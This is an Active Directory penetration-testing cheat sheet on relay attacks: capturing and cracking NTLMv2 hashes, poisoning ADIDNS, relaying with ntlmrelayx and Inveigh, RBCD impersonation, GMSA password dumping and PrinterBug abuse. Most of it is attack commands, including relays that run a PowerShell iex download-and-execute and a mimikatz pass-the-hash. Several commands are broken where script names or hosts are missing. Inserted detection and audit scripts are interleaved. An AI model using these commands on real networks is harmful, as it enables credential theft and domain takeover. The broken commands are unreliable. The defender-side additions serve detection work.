Relay Attacks - Active Directory Penetration Testing
2021-09-02 02:36:00

Relay attacks - Capturing SMB hashes

Import-Module .\Inveigh.ps1

#Start collecting hashes; we will see hashes whenever a user tries to access something non-existent via SMB
Invoke-Inveigh -ConsoleOutput Y

#cracking the hashes captured from inveigh
hashcat -m 5600 hash rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
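A defender-side check added here, not part of the original cheat sheet: the hashes above arrive because a poisoner answers LLMNR queries for names that do not exist, so a canary query for a bogus name that receives any answer is a reliable indicator. The code builds the LLMNR query and parses the reply; the canary name, the transaction id and the 10.0.0.99 answer are constructed, and sending the query over UDP 5355 to 224.0.0.252 is left to the caller.

```python
import socket, struct

def encode_name(name):   # DNS/LLMNR wire form: length-prefixed labels, zero terminator
    return b"".join(bytes([len(l)]) + l.encode() for l in name.split(".")) + b"\x00"

def build_llmnr_query(name, txid=0x1234):
    # LLMNR (RFC 4795) A query: id, flags=0, qd=1, an/ns/ar=0, then name, QTYPE A, QCLASS IN
    return struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0) + encode_name(name) + struct.pack(">HH", 1, 1)

def read_name(buf, off):   # decode a (possibly compressed) name -> (name, offset after it)
    labels = []
    while True:
        n = buf[off]
        if (n & 0xC0) == 0xC0:                       # compression pointer to an earlier name
            ptr = struct.unpack(">H", buf[off:off + 2])[0] & 0x3FFF
            labels.append(read_name(buf, ptr)[0])
            return ".".join(labels), off + 2
        off += 1
        if n == 0:
            return ".".join(labels), off
        labels.append(buf[off:off + n].decode())
        off += n

def parse_llmnr_answers(buf, txid):   # A-record addresses in a response to query txid
    rid, flags, qd, an, _, _ = struct.unpack(">HHHHHH", buf[:12])
    if rid != txid or not flags & 0x8000:            # wrong id, or not a response
        return []
    off = 12
    for _ in range(qd):                              # skip the echoed question(s)
        _, off = read_name(buf, off)
        off += 4
    ips = []
    for _ in range(an):
        _, off = read_name(buf, off)
        rtype, _, _, rdlen = struct.unpack(">HHIH", buf[off:off + 10])
        off += 10
        if rtype == 1 and rdlen == 4:
            ips.append(socket.inet_ntoa(buf[off:off + 4]))
        off += rdlen
    return ips

def poisoner_present(response, txid=0x1234):
    # Canary rule: a name that does not exist must get no answer at all.
    return bool(parse_llmnr_answers(response, txid))

# Constructed reply of the kind a poisoner sends for the bogus canary name.
CANARY = "nonexistent-canary-host"
FAKE_RESPONSE = (struct.pack(">HHHHHH", 0x1234, 0x8000, 1, 1, 0, 0)
                 + encode_name(CANARY) + struct.pack(">HH", 1, 1) + encode_name(CANARY)
                 + struct.pack(">HHIH", 1, 1, 30, 4) + socket.inet_aton("10.0.0.99"))
```

Run the canary from a few hosts on a schedule and alert on any answering address; disabling LLMNR and NBT-NS by policy removes the poisoning path altogether.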
Relay Attack using Responder 

sudo python /usr/share/responder/ -I tun0 -A 
git clone

#adding a DNS Record
sudo python3 -u 'steins.local\username' -p 'P@ssw0rd!' -a add -r 'application.steins.local' -d ATTACKER_IP SERVER_IP

#wait for the victim to access our DNS record :) you will get the user's NTLMv2 hash in Responder

#crack the hash with john
john --format=netntlmv2 hash --wordlist=wordlist.txt
Abusing ADIDNS and Relaying the Hashes

Import-module .\Invoke-DNSUpdate.ps1
Powershell Invoke-DNSUpdate -DNSType A -DNSName test -DNSData -Verbose

Import-module .\Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Tombstone -Verbose
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose

#Capture all the users' hashes
Import-module .\Inveigh.ps1
Invoke-Inveigh -ConsoleOutput Y -adidns combo
Invoke-Inveigh -ConsoleOutput Y -DNS Y

#Relaying the hashes for command execution
Import-module .\InveighRelay.ps1
invoke-inveighrelay -ConsoleOutput Y -Target -ShowHelp N -StatusOutput N -Command "powershell.exe -c iex(new-object'')"
Resource Based Constrained Delegation on MSSQL Server 

#Add a DNS Record using
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local

#Login to the MSSQL Server and run xp_dirtree on the DNS name you just created
SQLCMD -S SERVER04\RE7_MS -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin

#on your Kali box, run
sudo proxychains python steins.local SQL_server4$ USER
msDS-AllowedToActOnBehalfOfOtherIdentity is added to object SQL_server4$ for object USER

#View the privileges of the user
Get-ADComputer server -Server steins.local -Properties name,msDS-AllowedToActOnBehalfOfOtherIdentity,Principalsallowedtodelegatetoaccount,msds-allowedtodelegateto,trustedtoauthfordelegation

#Get TGT and gain access to the server
proxychains python3 ./ -dc-ip -spn cifs/server.steins.local -impersonate sql_admin steins.local/sql_user:Password@123
export KRB5CCNAME=sql_admin.ccache; sudo proxychains user/[email protected] -k -no-pass -dc-ip -target-ip
.\Rubeus.exe s4u /user:sql_user /rc4:58a478135a93ac3bf058a5ea0e8fdb71 /domain:steins.local /msdsspn:cifs/server.steins.local /impersonateuser:sql_admin /dc:dc.steins.local /ptt
dir \\server.steins.local\c$
psexec \\server.steins.local cmd.exe
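Detection for the RBCD step above, added here as an example and not from the original page: the write lands in Security Event ID 5136 as a change to msDS-AllowedToActOnBehalfOfOtherIdentity on the computer object, and a low-privileged account making that write is the thing to alert on. The key=value line layout, the account names and the trusted-writer allowlist are constructed.

```python
import re

# Constructed sample records: a flat key=value rendering of Windows Security
# Event ID 5136 (directory service object modified). Account names are made up.
SAMPLE_5136 = [
    "EventID=5136 SubjectUserName=sql_user ObjectDN=CN=SQL_SERVER4,CN=Computers,DC=steins,DC=local "
    "AttributeLDAPDisplayName=msDS-AllowedToActOnBehalfOfOtherIdentity OperationType=%%14674",
    "EventID=5136 SubjectUserName=svc_backup ObjectDN=CN=FS01,CN=Computers,DC=steins,DC=local "
    "AttributeLDAPDisplayName=description OperationType=%%14674",
    "EventID=5136 SubjectUserName=DC01$ ObjectDN=CN=WS05,CN=Computers,DC=steins,DC=local "
    "AttributeLDAPDisplayName=msDS-AllowedToActOnBehalfOfOtherIdentity OperationType=%%14675",
    "EventID=4662 SubjectUserName=sql_user ObjectDN=CN=SQL_SERVER4,CN=Computers,DC=steins,DC=local",
]

RBCD_ATTR = "msDS-AllowedToActOnBehalfOfOtherIdentity"
OP_NAMES = {"%%14674": "value added", "%%14675": "value deleted"}   # 5136 OperationType codes

def parse_event(line):
    """Split a key=value line into a dict; each value runs to the next whitespace."""
    return dict(re.findall(r"(\w+)=(\S+)", line))

def find_rbcd_changes(lines, trusted_writers=("DC01$",)):
    """One finding per write to the RBCD attribute on any object.

    An add made by an account outside trusted_writers is rated high: a low
    privileged user setting this attribute on a computer object is exactly the
    pre-condition for the impersonation step shown above.
    """
    findings = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "5136" or ev.get("AttributeLDAPDisplayName") != RBCD_ATTR:
            continue
        op = OP_NAMES.get(ev.get("OperationType"), ev.get("OperationType"))
        writer = ev.get("SubjectUserName", "?")
        severity = "high" if op == "value added" and writer not in trusted_writers else "info"
        findings.append({"object": ev.get("ObjectDN"), "writer": writer,
                         "op": op, "severity": severity})
    return findings

if __name__ == "__main__":
    for f in find_rbcd_changes(SAMPLE_5136):
        print(f"[{f['severity']}] {f['writer']}: {f['op']} on {f['object']}")
```

Event 5136 only fires when a SACL auditing "Write all properties" is applied to the computer objects, so confirm that auditing is in place before relying on this rule.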
Abusing GMSA by relaying 

Import-Module .\Invoke-DNSUpdate.ps1
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData Attacker_IP -Realm steins.local

#Invoke a web request from the service that is using the GMSA
Invoke-WebRequest -uri "http://might.steins.local" -UseDefaultCredentials

#Start capturing the data using ntlmrelayx; if it's running as administrator, SAM hashes will be dumped
sudo proxychains --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs -debug -t ldaps://GMSA_running_machine_IP

#in case the data is shown as a password blob, you can use the command below to convert it to an NTLM hash
(ConvertFrom-ADManagedPasswordBlob <blob>).SecureCurrentPassword | ConvertTo-NTHash

#OR, if the user can read GMSA passwords, you can use to dump the hashes
python3 -u 'USERNAME' -p 'P@SSW0RD!' -d 'steins.local' -l 'dc.steins.local'
Abusing PrinterBug

#find machines with unconstrained Delegation enabled
Get-ADComputer -Filter {TrustedForDelegation -eq $True}

#Compromise and log in to the machine with unconstrained Delegation enabled
Invoke-Mimikatz -Command '"sekurlsa::pth /user:USERNAME /domain:steins.local /rc4:58a478135a93ac3bf058a5e354fdb71 /run:powershell.exe"'

#Run SpoolSample.exe on the unconstrained-delegation-enabled machine
SpoolSample.exe TARGET_DOMAIN_FQDN UNCONSTRAINED_DOMAIN_FQDN

#OR
proxychains python3 steins.local/[email protected] KALI_IP -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0'
sudo proxychains -t smb:// -smb2support
Abusing ADIDNS to Send traffic to the target 

#Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes
Import-Module ./Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose

#assign permissions to the ADIDNS
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose
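An audit routine added here, not the original page's code, for the two ADIDNS changes above: a wildcard node and an ACE that lets Authenticated Users write to it. The node listing, the ACE tuples and the 10.0.0.0/28 infrastructure range are constructed; feeding it real zone data from your own enumeration is assumed.

```python
import ipaddress

# Constructed listing of nodes in an AD-integrated zone, shaped like what a zone
# enumeration returns: node name, A-record data, tombstone flag, and ACEs.
SAMPLE_NODES = [
    {"name": "dc", "data": "10.0.0.5", "tombstoned": False,
     "aces": [("Domain Admins", "GenericAll")]},
    {"name": "*", "data": "10.0.0.99", "tombstoned": False,
     "aces": [("Authenticated Users", "GenericAll")]},
    {"name": "wpad", "data": "10.0.0.5", "tombstoned": True,
     "aces": [("Domain Admins", "GenericAll")]},
    {"name": "application", "data": "10.0.0.99", "tombstoned": False,
     "aces": [("Domain Admins", "GenericAll")]},
]

# Constructed allowlist: addresses that records in this zone may legitimately point to.
KNOWN_INFRA = ipaddress.ip_network("10.0.0.0/28")
WRITE_RIGHTS = {"GenericAll", "GenericWrite", "WriteProperty", "WriteDacl", "WriteOwner"}
BROAD_PRINCIPALS = {"Authenticated Users", "Everyone", "Domain Users", "Domain Computers"}

def audit_adidns(nodes, known=KNOWN_INFRA):
    """Return (node, severity, reason) tuples for nodes that deserve a second look."""
    findings = []
    for n in nodes:
        if n["name"] == "*":
            findings.append((n["name"], "medium", "wildcard node answers every unresolved name"))
        for principal, right in n["aces"]:
            if principal in BROAD_PRINCIPALS and right in WRITE_RIGHTS:
                findings.append((n["name"], "high", f"{principal} has {right}"))
        if ipaddress.ip_address(n["data"]) not in known:
            findings.append((n["name"], "medium", f"data {n['data']} outside known infrastructure"))
        if n["tombstoned"]:
            findings.append((n["name"], "info", "tombstoned node present; review its owner"))
    return findings

if __name__ == "__main__":
    for node, sev, why in audit_adidns(SAMPLE_NODES):
        print(f"[{sev}] {node}: {why}")
```

Pair this with a watch on Event ID 5137 (object created) in the DomainDnsZones partition, since the Powermad commands above create the node as an LDAP object rather than through the DNS server.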
Capturing Hashes using responder and cracking hashes 

sudo proxychains responder -I tun0 -v  

hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force 
Relaying using ntlmrelayx

# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
# -l: store the collected info in a specified directory 
# -c: execute the command 
# -e: execute a binary

ntlmrelayx automatically dumps hashes when the relayed account has administrator access on the target, so look out for the hashes in the output. Also, the Impacket 0.9.23-dev version has issues with ntlmrelayx; better to use the stable version.
sudo proxychains -t smb:// -smb2support

Useful commands

sudo proxychains -t smb:// -smb2support

sudo proxychains -t smb:// -l loot -i -smb2support -c "powershell.exe -c iex(new-object'')"

#Target a specific user on a specific target
sudo proxychains -t smb://[email protected] -smb2support 
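A detection heuristic added here, not part of the original page, for the relays above: in a relayed NTLM logon, Event ID 4624 on the target records the victim's WorkstationName from the forwarded AUTHENTICATE message while IpAddress is the relay host, so the two no longer belong together. The event records and the name-to-address inventory are constructed.

```python
# Constructed sample records in the shape of Windows Security Event ID 4624
# (network logon, type 3); the name-to-address inventory is constructed too.
SAMPLE_4624 = [
    {"TargetUserName": "admin", "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "WorkstationName": "WS05", "IpAddress": "10.0.0.50"},
    {"TargetUserName": "sql_admin", "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "WorkstationName": "WS05", "IpAddress": "10.0.0.99"},
    {"TargetUserName": "svc_backup", "LogonType": "3", "AuthenticationPackageName": "Kerberos",
     "WorkstationName": "FS01", "IpAddress": "10.0.0.20"},
    {"TargetUserName": "helpdesk", "LogonType": "3", "AuthenticationPackageName": "NTLM",
     "WorkstationName": "LAPTOP77", "IpAddress": "10.0.0.61"},
]
INVENTORY = {"WS05": "10.0.0.50", "FS01": "10.0.0.20", "DC01": "10.0.0.5"}

def relay_suspects(events, inventory):
    """Flag NTLM network logons whose client-supplied WorkstationName does not
    belong to the connecting IpAddress.

    The relay forwards the AUTHENTICATE message (which carries the workstation
    name) unchanged, but the TCP connection comes from the relay host, so the
    two disagree. Kerberos logons carry no such field and are skipped.
    """
    suspects = []
    for ev in events:
        if ev.get("LogonType") != "3" or ev.get("AuthenticationPackageName") != "NTLM":
            continue
        ws, ip = ev.get("WorkstationName", "").upper(), ev.get("IpAddress")
        expected = inventory.get(ws)
        if expected is None:
            reason = "workstation not in inventory"
        elif expected != ip:
            reason = f"{ws} is {expected}, but the logon came from {ip}"
        else:
            continue
        suspects.append({"user": ev["TargetUserName"], "ip": ip, "workstation": ws, "reason": reason})
    return suspects

if __name__ == "__main__":
    for s in relay_suspects(SAMPLE_4624, INVENTORY):
        print(f"{s['user']} from {s['ip']}: {s['reason']}")
```

The unknown-workstation branch is noisy wherever VPN pools or NAT hide the true client, so tune the inventory before alerting on it; requiring SMB signing (and LDAP signing plus channel binding) blocks the smb:// and ldaps:// relay targets used above.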
Using Inveigh to Capture Hashes

Import-Module .\Inveigh.ps1

#Start ADIDNS abuse
Invoke-Inveigh -ConsoleOutput Y -adidns combo  

#Use credentials for ADIDNS Abuse using Inveigh
$SecPassword = ConvertTo-SecureString 'P#SSW)RD!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.LOCAL\USERNAME', $SecPassword)

Invoke-Inveigh -ConsoleOutput Y -adidns combo  -ADIDNSCredential $Cred -ADIDNSDomain 

Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSDomain steins.local -ADIDNSDomainController

#Capturing Hashes on the target 
Invoke-Inveigh -ConsoleOutput Y -DNS Y 

#cracking the hashes captured from inveigh
hashcat -m 5600 hash ~/Downloads/Tools/rockyou.txt --force -r  /usr/share/hashcat/rules/d3ad0ne.rule

#if you are unable to crack a hash, use inveigh-relay to relay the hashes
invoke-inveighrelay -ConsoleOutput Y -Target -ShowHelp N -StatusOutput N -Command  "powershell.exe -c whoami"